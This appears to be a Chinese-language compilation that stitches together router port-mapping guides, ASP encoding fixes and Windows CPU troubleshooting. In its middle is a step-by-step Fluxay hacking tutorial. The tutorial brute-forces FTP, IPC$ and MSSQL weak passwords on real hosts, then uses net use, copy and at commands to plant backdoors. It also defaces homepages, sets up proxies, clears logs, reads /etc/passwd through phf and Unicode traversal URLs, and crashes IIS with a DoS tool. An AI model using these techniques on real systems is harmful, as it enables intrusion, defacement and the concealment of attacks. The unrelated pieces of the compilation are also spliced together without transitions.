ADSL路由方式的NAT(端口映射)专题

NAT是网络地址翻译就是把公网IP翻译成私有地址, 又叫端口映射或端口转发. 采用路由方式是指ADSL拥有一个动态或固定的公网IP，ADSL直接接在HUB或交换机上，所有的电脑共享上网。这时ADSL的外部地址只有一个，比如61.177.*.*。 而内部的IP是人为设置的，比如ADSL设为192.168.0.1,下面的电脑就依次设为192.168.0.*(*表示1、2、3。。。）。 　 如何实现NAT功能呢？一般路由器中有个虚拟服务器的设置。针对邮件服务器要做如下设置：进入“虚拟服务器”，在端口填入 25, 协议中选择： TCP, IP地址：192.168.16.x(安装邮件服务器电脑的局域网IP地址），同样方法设置110(pop3),6080(webmail)端口 　　另一种方法就是开放主机。开放主机(DMZ Host)是针对IP地址，取消防火墙的功能，将该局域网的IP地址直接映射到外部IP之上，采用开放主机(DMZ)的方式，不必管端口是多少。这种方式只支持一台内部电脑。

介绍几款ADSL Modem的端口映射做法  

华硕6000EV/6005HW ADSL MODEM中设置端口映射（转发）

    在主菜单中点“NAT”，会有个“nat channel list”，以在内部pc 192.168.1.2上架设web server为例子，web的一般默认端口是80，设置如下： 在nat channel list里面的mupltiple port forwarding里面填写以下内容：

action: add
channel no:1
protocol:tcp
incoming port, begin:80, end :80
new port begin:80,end :80
new ip address:192.168.1.2。

LINKSYS ADSL路由器中中设置端口映射（转发）

    在主菜单中点“advanced”，接下来的菜单中有个“forwarding”，以在内部pc 192.168.1.2上架设web server为例子，web的一般默认端口是80，设置如下：

extport: 80 to 80
ip address:192.168.1.2

然后点击“apply”就可以了。

宽频蓝色小精灵路由器中设置端口映射（转发）

    在高级设置页面下点“Distributed Servers Setup(Virtual Serves,虚拟主机设置)”
每个Virtual Server 定义为一个Service Port，所有对这个端口的访问都会重定向到相应的Service IP 所对应的计算机。

例如,假如您要：

在计算机192.168.123.10 上架设FTP 服务器。(port 21)
在计算机192.168.123.20 上架设Email的smtp 服务器。(port 25)
在计算机192.168.123.30 上架设Web 服务器。(port 80)
在计算机192.168.123.40 上架设Pop服务器。(port 110)

那么，您就需要在此页作如下设置：

Service Service Port Service IP Enable

FTP 21 192.168.123.10 √
Email 25 192.168.123.20 √
Web 80 192.168.123.30 √
Post Office 110 192.168.123.40 √

如果是通过代理服务器上网可以通过 软件做端口映射

注：如果需要架设其他类型的服务器，那么在设置“端口印射”时侦听的协议和端口有所不同。具体的端口及其描述请看：
常见的网络服务和对应端口
　 下表是一些常见的网络服务和对应的端口号。

服务名称  端口号/协议 [别名]  #注释  
   
ftp-data  20/tcp  #FTP, data  
ftp  21/tcp  #FTP. control  
telnet  23/tcp   
smtp  25/tcp mail  #Simple Mail Transfer Protocol  
time  37/tcp timserver   
time  37/udp timserver   
domain  53/tcp  #Domain Name Server  
domain  53/udp  #Domain Name Server  
tftp  69/udp  #Trivial File Transfer  
gopher  70/tcp   
http  80/tcp www www-http  #World Wide Web  
pop3  110/tcp  #Post Office Protocol - Version 3  
nntp  119/tcp usenet  #Network News Transfer Protocol  
netbios-ns  137/tcp nbname  #NETBIOS Name Service  
netbios-ns  137/udp nbname  #NETBIOS Name Service  
netbios-dgm  138/udp nbdatagram  #NETBIOS Datagram Service  
netbios-ssn  139/tcp nbsession  #NETBIOS Session Service  
imap  143/tcp imap4  #Internet Message Access Protocol  
snmp  161/udp  #SNMP  
snmptrap  162/udp snmp-trap  #SNMP trap  
irc  194/tcp  #Internet Relay Chat Protocol  
ipx  213/udp  #IPX over IP  
ldap  389/tcp  #Lightweight Directory Access Protocol  
https  443/tcp MCom   
https  443/udp MCom   
uucp  540/tcp uucpd   
ldaps  636/tcp sldap  #LDAP over TLS/SSL  
doom  666/tcp  #Doom Id Software  
doom  666/udp  #Doom Id Software  
phone  1167/udp  #Conference calling  
ms-sql-s  1433/tcp  #Microsoft-SQL-Server  
ms-sql-s  1433/udp  #Microsoft-SQL-Server  
ms-sql-m  1434/tcp  #Microsoft-SQL-Monitor  
ms-sql-m  1434/udp  #Microsoft-SQL-Monitor  
wins  1512/tcp  #Microsoft Windows Internet Name Service  
wins  1512/udp  #Microsoft Windows Internet Name Service  
l2tp  1701/udp  #Layer Two Tunneling Protocol  
pptp  1723/tcp  #Point-to-point tunnelling protocol  
radius  1812/udp  #RADIUS authentication protocol  
radacct  1813/udp  #RADIUS accounting protocol  
nfsd  2049/udp nfs  #NFS server  
knetd  2053/tcp  #Kerberos de-multiplexor  
man  9535/tcp  #Remote Man Server  

软件做端口映射

关于ADSL modem 的端口映射设置请参考 　

很多朋友想建WEB服务器在Internet上共享自己的资源，苦于没有公网IP，无法实现。其实，内网IP也可以建WEB服务器的。

浏览器不支持嵌入式框架，或被配置为不显示嵌入式框架。

第一步：
首先当然要安装meibuddns,申请一个动态域名解析了，

下载后你可以把它安装在你的局域网服务器或者客户机上都可以。
一路回车安装完后，按提示，注册一个新的域名： **.meibu.net
注册好后，如果一切正常，你的meibuddns客户端便已经工作了，可以对你的静态或动态IP地址解析了。  

第二步：
但是，现在的meibuddns只能映射你局域网服务器的IP，外部并不能访问你的机器。
现在你需要一个端口映射软件。
“
推荐一个小巧实用的工具: portTunnel

配合在局域网内架设网站的利器 --- PortTunnel介绍

这里向大家推荐一款工具，可以帮助大家轻松搞定“端口映射”。这款工具叫“PortTunnel”（中文意思叫“端口通道”），由SteelBytes出品，目前已经完全免费了！它的设置极其简单，可以运行在所有的Windows平台上。

好了，让我们来实际x作一番：

假设我是一个局域网用户，我的内部IP地址是10.10.10.10，我是通过指定网关10.10.10.1上网的，我在自己的计算机上安装了“动态IP解析”软件和WEB服务器还有FTP服务器准备开一个网站和FTP服务器。以下是我的设置过程：

1. 到我的网关（代理）服务器10.10.10.1 上安装“PortTunnel”软件（拷贝即可）



这是软件的界面：


2. 针对我需要的WEB服务进行配置，点击“Add”按钮，然后配置如下：



点击“OK”按钮保存

注意：

图中Port In填的端口号是80，这样填的前提是网关（代理服务器）上没有WEB服务器在运行，否则请更换其它端口，例如“8080”（在这种情况下，用户必须通过http://<你的域名>:8080来访问你的网站。）

3. 针对我需要的FTP服务进行配置，点击“Add”按钮，然后配置如下：


点击“OK”按钮保存

注意：

图中Port In填的端口号是21，这样填的前提是网关（代理服务器）上没有FTP服务器在运行，否则请更换其它端口，例如“2100”（在这种情况下，用户必须通过ftp://<你的域名>:2100来访问你的FTP服务器。）

4. 设置成功后的正常运行界面（平时这个界面可以关掉，不会影响使用）



注意：

正常运行时，你设置的通道的状态应当是“Active”，如果是“Failed”那很可能你设置的“Port In”端口号和网关（代理服务器）上的现有端口冲突。

5. 测试一下：

如果通过http://<你的域名>能访问你的网站或FTP://<你的域名>能访问你的FTP服务器，那就成功了。

重要提示：

如果局域网内有多个用户想架设网站，那么注意在设置的时候，一个“Port In”端口只能为一个用户服务，例如，usera使用了“80”作“Port In“，那么他的网站就可以通过“http://”来访问，而userb就只能使用其它“Port In”端口了，例如“8080”，他的网站只能通过“http://:8080”来访问了。FTP服务器的道理也是一样。

附：

PortTunnel的下载地址：

http://www.steelbytes.com/download/PortTunnel_CH.zip (中文)

http://www.steelbytes.com/download/PortTunnel_ENGUK.zip (English)

这里，Port In是要监听的端口，port out是要映射的端口。比如你想监听服务器的88端口，映射到你的机器的80端口，这里的port in便是88，port out便是80。默认的FTP端口是21，如果想开FTP服务器，这里可以是21。
添加后，点"start"，服务器开始。程序自动加入系统服务，每次开机便会自动启动。

以上两步完成，一切OK！
好了，现在可以用你申请的 “d2g域名:监听端口” 来访问你的机器了。

带端口映射的NAT配置实例

如果ISP提供的IP地址比较多可以使用NAT为每一个服务器映射一个外部地址。但如果不是的时候(如就两个时),内网有四台服务器需要团对外提供服务，一个用于内网地址转换,另一个用于对外网提供服务.

Interface fastethernet0/0
Ip address 192.168.1.1 255.255.255.0
Duplex auto
Speed auto
Ip nat inside
No shutdown
Interface fastethernet0/1
Ip address 211.82.220.129 255.255.255.248
Duplex auto
Speed auto
Ip nat outside
No shutdown

Access-list 1 permit 192.168.1.0 0.0.0.255
Ip nat inside source list1 interface fastethernet0/1 overload
Ip nat inside source static tcp 192.168.1.2 80 202.99.220.130 80
Ip nat inside source static tcp 192.168.1.3 21 202.99.220.130 21
Ip nat inside source static tcp 192.168.1.4 25 202.99.220.130 25
Ip nat inside source static tcp 192.168.1.5 110 202.99.220.130 110

造成程序乱码或者下载文件乱码的解决办法

l-blog会造成其他程序乱码，其实这个问题不是l-blog的问题，也不是浏览器的问题，更加不是服务器的问题！而是其他程序代码不规范的问题！

有几种方法:
1.在程序的最开始增加
推荐使用这种方法
就是在打开GB2312的代码页时调用合适的GB2312代码
(936是GB2312的代码页，UTF-8的是65001)
动网论坛：
修改 conn.asp 文件，在 Response.Buffer = True 后面增加一句 Session.CodePage=936 就可以了！
2.另外一种简单的修改方法
在 footer.asp 的最后添加一行：Session.CodePage=936
936是gb2312的代码页，utf-8的是65001
作用是在访问完UTF-8代码页时自动转用GB2312
有时效果不是很好,,如果出现乱码要多刷新几次就行了,
如果你有空,也可以互转


UTF-8与GB2312互转方法
第一步：修改 commond.asp 文件，将文件的前4行，也就是 '定义 Cookie,Application 域 前面的代码用以下代码替换：
Quoted from Unkown:
参考的是：
如果制作的网页脚本与WEB服务端的默认代码页不同，则必须指明代码页：
codepage=936 简体中文GBK
codepage=950 繁体中文BIG5
codepage=437 美国/加拿大英语
codepage=932 日文
codepage=949 韩文
codepage=866 俄文
codepage=65001 unicode UFT-8第二步：把所有的
改成
再另存为ANSI
GB2312转换为UTF-8编码的方法
第一步：
修改 commond.asp 文件，将文件的前4行，也就是 '定义 Cookie,Application 域 前面的代码用以下代码替换：
程序代码：
修改为：
程序代码：
第二步：
将BLOG的所有ASP和JS文件，用记事本打开，然后另存为，编码本来是默认， 选择成UTF-8就可以了.

一、POP3/FTP/…探测  

二、IPC探测  

三、SQL探测  

四、高级扫描  

五、其它 …  

因为开发时间的原因，上面的探测模式略有不同，所以分成了四个部分，本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了：）  

下面我就简单说一下基本的破解流程：  

1、启动流光

2、找个站点，我选的是中华网www.china.com的主页空间（home4u.china.com），探测方式：FTP。  

有人常问扫描端口有什么用，其实作用就是你知道他提供了什么服务，然后可以采取相应的探测方式来获得PASS了：）我们知道主页几乎都用的FTP上传，我们这次就用来测试一堆用户名，看看有没有弱智的密码，呵呵，如果有 hacker.at.china.com 这样的，也不妨霸占为己有：）  

3、加入要破解的站点名称：右键单击FTP主机→编辑→添加→输入 home4u.china.com →确定！  

4、加入用户名：我们要破解的是一堆用户名，所以要加入用户名的列表文件！我们就加入流光目录下的 Name.dic ：）右键单击刚才添加的主机：home4u.china.com → 编辑 → 从列表中添加 → Name.dic → 打开  

然后会有“用户已存在列表中”的提示，我们选中“不再提示” → 确定 。如下图：  

用户名太多，我们可以用点主机前面的“—”号把用户列表缩起来，如下图：  

大家注意名字前面的小框中必须有√要是没有就无法探测了。  

5、有了用户名，我们就可以进行探测了，大家会想到怎么不用密码？其实流光有个简单模式的探测，也就是用内置的密码”：“123456”和“用户名”来进行探测，因为这样的密码是使用频率最高的：）当然你可以修改这个简单模式的文件，加入你认为弱智的密码。方法是：单击 工具菜单 → 模式文件设定 → 简单模式探测设置文件 → 加入你要加入的密码 → 把设置文件存盘！下面我们就来看看这一堆名字里面有多少是用“123456”和“自己名字”来作为密码的。  

探测 → 简单模式探测！  

探测中…

6、探测完毕，也看到结果了，流光会问我们是否查看入侵检测报告，不想看可以选否。 报告的画面  

7、如果要探测的是一个用户名，就需要添加字典、或者密码方案。方法是：右键单击解码字典或方案 → 编辑 → 添加 → 选择一个密码档即可。  

以上就是流光的一次简单的探测了，事实上这些功能只能算是流光的2.5版的功能，流光2001增加的IPC/SQL/高级扫描等功能，使流光更加强大。如果你对这个已经很熟悉了，相信你看流光的HELP就会很快的学会其它的使用方法的。  

关于用户名的问题：有人觉得自己加入的用户名不一定存在，如果不存在岂不是白费了力气？这点你大可以放心，流光会进行验证的。而且现在注册的用户入数之多，想个没有的名字都难，不信你随便敲个试试。  

关于字典的问题：流光可以使用字典方案来探测，当然你也可以生成字典，有的新手在作练习的时候不知道怎么做，你也可以用记事本生成，每行输入一个密码，存盘后将扩展名改称.DIC，流光就认出来了：）如果你连扩展名都不会改 ：（   那……  

只要是学习、谁都会遇到困难，我也是问题多多，还得向小榕、EKIN讨教，欢迎大家多交流 ：）  



NO.2

今天要写的是流光的IPC探测：  

一、目的和任务：  

1、用流光的IPC探测获得一台NT主机的管理权限，并将这台主机做成一个跳板/代理。  

2、学习IPC探测的相关知识。  

二、探测流程：  

1、你得有流光，我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/  

2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000，否则流光启动会失败！  

什么是IPC：  

IPC是指"InterProcess Communications",准确的说是ipc$，是默认的在系统启动时的admin共享。  

IPC$是Windows NT/2K中特有的远程网络登陆功能，它的特点是在同一时间内，两个IP之间只允许建立一个连接.注意，你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功.可不可以通过IPC$暴力破解密码？当然可以 ！ 不过，是不是太笨了点 …  

2、首次启动流光，会看到注册的画面，具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC.探测获得管理的权限。这里我们要作的是得到一台跳板，那么就可以用命中率高的办法来探测了（测试一堆IP来得到弱口令）。  

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。  

3、出先了上面的小窗口，输入我们要破解的IP段，我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，这样可以加快扫描的速度 ：）填入IP，选择扫描NT/98主机  

4、探测中……  

（注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现"IP保留"的字样）  

5、这是扫描到的NT/98主机列表：

6、没有扫描到常用密码：  

7、就不要查看报告了 ：…  

8、有了不少NT/98的机器了，正式开始IPC$探测：IPC$主机－探测－探测所有IPC$用户列表。  

9、注意下面两个对话框的设置：全选上，我们只要IPC$管理员的弱口令。然后点选项  

10、点“选项” ：为了加快弱口令扫描速度，这里的两个我们可以全部取消，比如下面的那个，如果对方禁止列出用户了，我想对于一个网管来说，弱口令可能性也是微乎其微。  

11、探测中……  

12、有密码了：）  

13、又出现了查看报告的窗口，看看 ：）  

14、有远程主机的管理密码了，我们剩下的就是想办法控制它了，有什么好办法么？ ：）有的是 ！自己看看工具－菜单下的IIS远程命令是不是很简单呢，我以后在说，今天还是先练习net 命令吧。  

15、黑了他 ！  

开个dos prompt 执行如下命令，本次用的例子如下图。  

1、 net use　file://对方ip/ipc$ "密码"　/user:"用户名" || 建立远程连接  

2、 copy icmd.exe file://对方ip/admin$ 　||　admin$是对方的winnt目录　：）　这里文件多。  

3、 net time file://对方IP/   ||　看看对方的本地时间  

4、at file://对方ip/ 启动程序的时间　启动程序名 启动程序的参数  ||　用at命令来定时启动程序，在这里我们用soon这个程序来做也可以，它可以取代　３/4两步。  

5、 telnet 对方ip　端口  ||  

6、输入pass （如果不是用icmd.exe，或者没有设置口令就不用了） ||  

7、在开个窗口，继续copy 我们用的东西。　copy sock.exe copy ntlm.exe 　copy cl.exe clear.exe  

如果我们真的想黑了他，只需要把我们的首页文件覆盖目标的首页就ok了，我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止，一般是在X:\interpub\wwwroot\ .  

假如首页文件是default.htm并且在c:\interpub\wwwroot，这样:copy default.htm \\ip\c$\interpub\wwwroot  

7、其实黑人家是很低级并且没意思的：（，我们最好是物有所有，作成跳板吧，今后干活方便点：）  

执行我们copy 过去的ntlm.exe ，取消验正。在给自己留个后门，比如提升guest的权限，或者其它的后门工具，这类东西多了自己选吧，看看杀手copy的那堆东西　：）  

8、做个SOCK5代理玩玩，用在QQ上不错喔：  

执行我们copy  过去的sock -install，net start skserver 看看用在QQ上的效果：）  

是不是没有看清上面的步骤呢？下面是我telnet 上去后所有的命令：）  

9、还能做成其他的么 ？  

当然了，只要你有时间，并且愿意做，我曾经偷偷的把自己的主页放到人家的server上，速度快、空间无限，嘿嘿 ：）  

10、日志清除，断开连接 ：  

执行我们copy 过去的cl.exe clear.exe 都可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use file://ip/ipc$ /delete 这步我认为是必需的，尤其是在一些有争议的站点上，或者是国内的站点，除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。 在网吧写完：（　错误之处请赐教。  

只要是学习、谁都会遇到困难，我也是问题多多，还得向小榕、EKIN讨教，欢迎大家多交流 ：）  



NO.3

今天要写的是流光的SQL探测，顺便说说ipc$补遗和其它的探测手段。  

一、目的和任务：  

1、用流光的SQL探测获得一台NT主机的管理权限。  

2、学习SQL探测的相关知识。  

3、IPC$补遗和其它…  

二、探测流程：  

1、你得有流光，这话不用在说了吧：）  

什么是SQL：  

SQL：微软开发的数据库，专门用在微软的OS上，功能类似Linux 下的Mysql，晕……，到底谁类似谁啊？有时间 去看看SQL的联机手册，说的很明白。  

SQL服务程序支持的网络协议:  

Named pipes :使用NT SMB端口来进行通信，存在被SNIFFER截获数据的危险。  

IP Sockets  :默认状态下开1433端口，可以被扫描器探测，存在被SNIFFER截获数据的危险。  

Multi-Protocol ：客户端需要支持NT RPCs，数据加密。  

NWLink ：存在被SNIFFER截获数据的危险。  

AppleTalk (ADSP)：存在被SNIFFER截获数据的危险  

anyan Vines ：存在被SNIFFER截获数据的危险.在Internet上，95％以上的SQL Server 采用的都是IP Sockets协议，流光探测的就是这个协议默认的1433端口  

2、我们要获得SQL 主机的管理权限，那么还用命中率高的办法来探测了（测试一堆IP来得到弱口令）。对一台固定主机的探测等我下期的教程：）在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。  

3、出先了下面的小窗口，输入我们要破解的IP段，我们输入了来看看。（注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现“地址保留的信息”）   

4、探测中……  

5、有密码了：）  图psss 1→3  

6、下面我们进一部获取管理员的权限。  

用SQL 客户端去连接主机，没有装SQL ……………… 没关系，流光自带了连接的工具，以前我一直都是用的天行的工具SQLexec，但现在可以不用它了。  

打开菜单 工具 → MSSQL工具 → SQL远程命令看看：）   

7、获得管理权限、增加后门  

8、现在我们已经是管理员了：）  

以前我们是用at命令来远程运行程序，今天顺便说说流光中自带的“种植者”，看看 工具 → nt/iis工具 → 种植者，我们来用它远程启动icmd这个后门。一分钟后登陆看看  

9、再说说 工具 → 模式文件设定 → ipc简单设置文件 。“工具”中其他的项目和上面说的两个类似，就不多说了。  

10、日志清除，断开连接 ，参考IPC探测，记住可以用种植者远程执行命令。  

关于IPC$补遗：上篇对与IPC$探测的文章，写完后觉得还差点什么没有说：）  

1、我们虽然只探测管理员（admin）的弱口令，实际上在真正攻击中是任何一个用户口令都不会放过尝试的，因为我们获得了普通用户权限后可以提升权限，事实上，一个普通用户的权限在＊nix攻击中是非常重要的。  

2、获得口令后，攻击手法多样，不要局限于我的例程。  

3、如果对方没有XXX怎么办？，这类的问题去看看我以前整理的流光FAQ。  

关于其它探测:玩玩3389 ？首先终端是WIN2K提供的功能，所以我们在扫描的时候就要选择 “NT/98”的主机，在得到主机列表后自定义端.口来扫描这些主机的3389端口，然后…… 玩玩cisco路由器?自己想想怎么作 ？要是想出来了，我的以后的教程就不用看了 ：）明白了么？我说的意思是要灵活使用流光：） 1、分析并利用流光的扫描结果。  

2、顺便学点相关的知识。  

二、开始分析：  

1、具备相关的系统知识，基础是必须的 。  

比如21端口开放：想到了什么呢？wu_ftp溢出 ，本地权限提升，溢出root ？这需要点经验了，但你至少应该想到去cd /看看吧。  

其他还有好多，看看基础的书吧，我只能说一下方法。  

2、我们用IPC$扫描和上篇的高级扫描，我们得到的许多结果，比如idq、print、unicode、frontpage，来对这些结果进行分析利用一下。  

先说说一般攻击流程：  

1）确定攻击目标：这个要看我们的目的了 ；）  

2）搜集目标的相关资料  

3）根据获得的信息进行攻击  

4）获得最高权限  

5）留后门、清理日志  

现在我们已经能够获得对方的相关资料了，在NT Server 中后门和日志也说过了，所以今天说3、4步的内容。  

2、具体攻击实施方法：  

1）利用url攻击的方法：这种方式用的很多，比如unicode。通常是在IE地址栏通过提交修改的URL，进行非法登陆或者浏览等。  

2）利用暴利破解：比较费时，但也有一定的技巧可寻，比如用finger后的用户列表进行简单探测。  

3）利用系统的相关服务攻击：比如输入法漏洞＋终端，Frontpage 扩展，行行色色的溢出等。  

如何进行溢出呢 ？  

一般来说是在网上找到针对漏洞相关的溢出源码，根据自己的需要进行修改，然后用gcc 或者c++等编译，最好用编译好的程序攻击了，绝大多数都是这样的格式：program.exe  -option   ip  

是不是觉得很难呢？  

现在网上有许多好心的大虾都给你修改编译好了，你直接找来用就行。但。。。。。不想多学点东西么？  

好了，不罗嗦了：）  

先看看构造特殊url：（以Unicode为例）  

什么是Unicode?  

Unicode漏洞是因为在Unicode编码中，有这样一个编码方式%c1%hh %c0%hh (0x00〈= 0xhh 〈 0x40) 等等，  

而该死的IIS 却是这样理解的：把“%c1%hh" 解释成(0xc1 -0xc0) * 0x40 + 0xhh  

结果就有了这样的组合：  

%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'  

%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'  

通过这两个小小的“/”“\”，我们就可以构造特殊URL来深入到系统的根目录了，看看下图：  

url1  

url2  

url3  

这只是个简单的例子，用URL的还有的是，比如phf漏洞：  

可以构造 http://www.xxx.com/cgi-bin/phf?Qalias=x/bin/cat ;/etc/passwd  

在比如：http://www.hacker.com/vti_pvt/service.pwd ;等等  

域名是随便写的，勿对号入座哦  

暴利破解，简单探测，我在第一篇教程中就说了，自己找找看看。  

我们来说利用系统服务溢出的：  

输入法漏洞需要WIN2K 终端，终端成了hacker工具：）  

Frontpage 扩展，需要Frontpage ， 作网页的东西也成了黑客工具：）  

Frontpage 扩展攻击： 启动Frontpage － 文件  － 打开站点 － 输入站点的IP ，如果要口令就输入得到的口令，免费给人家设计的主页吧 ：）  

是不是很简单呢？  

看看溢出：  

这个是图形的，很简单，其实溢出程序多是命令行的。  

对方存在shtml.dll这个漏洞，如何攻击呢？  

先找找关于漏洞的说明，然后找相关的程序，比如我用的：  

dos.exe 211.21.22.11 对方IIS 拒绝服务了 ，当掉 ！会了么？  

好了，你应该学到点什么了，准确的说你应该发现点什么了。发现什么了呢？  

1、凡是涉及到概念基础的时候，你潜意识中是跳过去不愿意看的。  

2、攻击多是用现成的工具实现的。用工具当然没什么不好，但你知道当溢出时，为什么要用nc监听本地端口么？  

我所讲的攻击实例其实是为了满足你的好奇心而已，希望你能看得更深一点：）

我们在使用Windows XP操作系统的时候，用着用着系统就变慢了，一看“ 任务管理器 ”才发现CPU占用达到100%。这是怎么回事情呢?遇到病毒了，硬件有问题，还是系统设置有问题，在本文中笔者将从硬件，软件和病毒三个方面来讲解系统资源占用率为什么会达到100%。

经常出现CPU占用100%的情况，主要问题可能发生在下面的某些方面:

CPU占用率高 的九种可能

1、防杀毒软件造成 故障

由于新版的 KV 、金山、 瑞星 都加入了对网页、 插件 、邮件的随机监控，无疑增大了系统负担。处理方式:基本上没有合理的处理方式，尽量使用最少的监控服务吧，或者，升级你的硬件配备。

2、驱动没有经过认证，造成CPU资源占用100%

大量的测试版的驱动在网上泛滥，造成了难以发现的故障原因。 处理方式:尤其是 显卡驱动 特别要注意，建议使用 微软认证 的或由官方发布的驱动，并且严格核对型号、版本。

3、 病毒、木马 造成

大量的蠕虫病毒在系统内部迅速复制，造成CPU占用资源率据高不下。解决办法:用可靠的杀毒软件彻底清理系统内存和本地硬盘，并且打开系统设置软件，察看有无异常启动的程序。经常性更新升级杀毒软件和防火墙，加强防毒意识，掌握正确的防杀毒知识。

4、控制面板— 管理工具 —服务—RISING REALTIME MONITOR SERVICE 点鼠标右键，改为手动。

5、开始->运行->msconfig->启动，关闭不必要的启动项，重启。

6、查看“ svchost ”进程。

svchost . exe 是Windows XP系统 的一个核心进程。 svchost.exe 不单单只出现 在Window s XP中，在使用 NT 内核的 Windows系统 中都会有svchost.exe的存在。一般在 Windows 2000 中 svchost.exe进程 的数目为2个，而 在Windows XP中svchost.exe进程的数目就上升到了4个及4个以上。

7、查看 网络连接 。主要是网卡。

8、查看网络连接

当安装了Windows XP的计算机做服务器的时候，收到端口 445 上的连接请求时，它将分配内存和少量地调配 CPU资源来为这些连接提供服务。当负荷过重的时候，CPU占用率可能过高，这是因为在工作项的数目和响应能力之间存在固有的权衡关系。你要确定合适的 MaxWorkItems 设置以提高系统响应能力。如果设置的值不正确，服务器的响应能力可能会受到影响，或者某个用户独占太 多系统 资源。

要解决此问题，我们可以通过修改注册表来解决:在 注册表编辑器 中依次展开[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver ]分支，在右侧窗口中 新建 一个名为“maxworkitems”的 DWORD值 。然后双击该值，在打开的窗口中键入下列数值并保存退出:

如果计算机有512MB以上的内存，键入“1024”；如果计算机内存小于 512 MB，键入“256”。

9、看看是不是Windows XP使用鼠标右键引起CPU占用100%

前不久的报到说在资源管理器里面使用鼠标右键会导致CPU资源100%占用，我们来看看是怎么回事？

征兆:

在资源管理器里面，当你右键点击一个目录或一个文件，你将有可能出现下面所列问题:

任何文件的拷贝操作在那个时间将有可能停止相应
网络连接速度将显著性的降低
所有的流输入/输出操作例如使用Windows Media Player 听音乐将有可能是音乐失真成因:
当你在资源管理器里面右键点击一个文件或目录的时候，当快捷 菜单显示 的时候，CPU占用率将增加到100%，当你关闭快捷菜单的时候才返回正常水平。

解决方法:

方法一:关闭“为菜单和工具提示使用过渡效果”

1、点击“开始”--“控制面板”
2、在“控制面板”里面双击“显示”
3、在“显示”属性里面点击“外观”标签页
4、在“外观”标签页里面点击“效果”

5、在“效果”对话框里面，清除“为菜单和工具提示使用过渡效果”前面的复选框接着点击两次“确定”按钮。

方法二:在使用鼠标右键点击文件或目录的时候先使用鼠标左键选择你的目标文件或目录。然后再使用鼠标右键弹出快捷菜单。

CPU占用100%解决办法

一般情况下CPU占了100%的话我们的电脑总会慢下来，而很多时候我们是可以通过做 一点点 的改动就可以解决，而不必问那些大虾了。

当机器慢下来的时候，首先我们想到的当然是任务管理器了，看看到底是哪个程序占了较搞的比例，如果是某个大程序那还可以原谅，在关闭该程序后只要CPU正常了那就没问题；如果不是，那你就要看看是什幺程序了，当你查不出这个进程是什幺的时候就去google或者 baidu 搜。有时只结束是没用的，在 xp下 我们可以结合msconfig里的启动项，把一些不用的项给关掉。在2000下可以去下个winpatrol来用。

一些常用的软件，比如浏览器占用了很搞的CPU，那幺就要升级该软件或者干脆用别的同类软件代替，有时软件和系统会有点不兼容，当然我们可以试下xp系统下给我们的那个兼容项，右键点该. exe文件 选兼容性。

svchost.exe有时是比较头痛的，当你看到你的某个svchost.exe占用很大CPU时你可以去下个aports或者fport来检查其对应的程序路径，也就是什幺东西在掉用这个svchost.exe，如果不是c:\Windows\ system32 (xp)或c:\winnt\system32(2000)下的，那就可疑。升级杀毒软件杀毒吧。

右击 文件导致100%的CPU占用我们也会遇到，有时点右键停顿可能就是这个问题了。官方的解释:先点左键选中，再右键(不是很理解)。非官方:通过在桌面点右键-属性-外观-效果，取消”为菜单和工具提示使用下列过度效果(U)“来解决。还有某些杀毒软件对文件的监控也会有所影响，可以 关闭杀毒软件 的文件监控；还有就是对网页，插件，邮件的监控也是同样的道理。

一些驱动程序有时也可能出现这样的现象，最好是选择微软认证的或者是官方发布的驱动来装，有时可以适当的升级驱动，不过记得最新的不是最好的。

CPU降温软件 ，由于软件在运行时会利用所以的CPU空闲时间来进行降温，但Windows不能分辨普通的CPU占用和 降温软件 的降温指令 之间的区别 ，因此CPU始终显示100%，这个就不必担心了，不影响正常的系统运行。

在处理较大的 word文件 时由于word的拼写和语法检查会使得CPU累，只要打开word的工具-选项-拼写和语法把”检查拼写和检查语法“勾去掉。

单击 avi视频 文件后CPU占用率高是因为系统要先扫描该文件，并检查文件所有部分，并建立索引；解决办法:右击保存视频文件的文件夹-属性-常规-高级，去掉为了快速搜索，允许索引服务编制该文件夹的索引的勾。



CPU占用100%案例分析

1、 dllhost进程造成CPU使用率占用100%

特征:服务器正常CPU消耗应该在75%以下，而且CPU消耗应该是上下起伏的，出现这种问题的服务器，CPU会突然一直处100%的水平，而且不会下降。查看任务管理器，可以发现是DLLHOST.EXE消耗了所有的CPU空闲时间，管理员在这种情况下，只好重新启动IIS服务，奇怪的是，重新启动IIS服务后一切正常，但可能过了一段时间后，问题又再次出现了。

直接原因:

有一个或多个ACCESS数据库在多次读写过程中损坏，微软的 MDAC 系统在写入这个损坏的ACCESS文件时，ASP线程处于BLOCK状态，结果其它线程只能等待，IIS被死锁了，全部的CPU时间都消耗在DLLHOST中。

解决办法:

安装“一流信息监控拦截系统”，使用其中的“首席文件检查官IIS健康检查官”软件，

启用”查找死锁模块”，设置:

--wblock=yes
监控的目录，请指定您的主机的文件所在目录:
--wblockdir=d:\test

监控生成的日志的文件保存位置在安装目录的log目录中，文件名为:logblock.htm

停止IIS，再启动“首席文件检查官IIS健康检查官”，再启动IIS，“首席文件检查官IIS健康检查官”会在logblock.htm中记录下最后写入的ACCESS文件的。

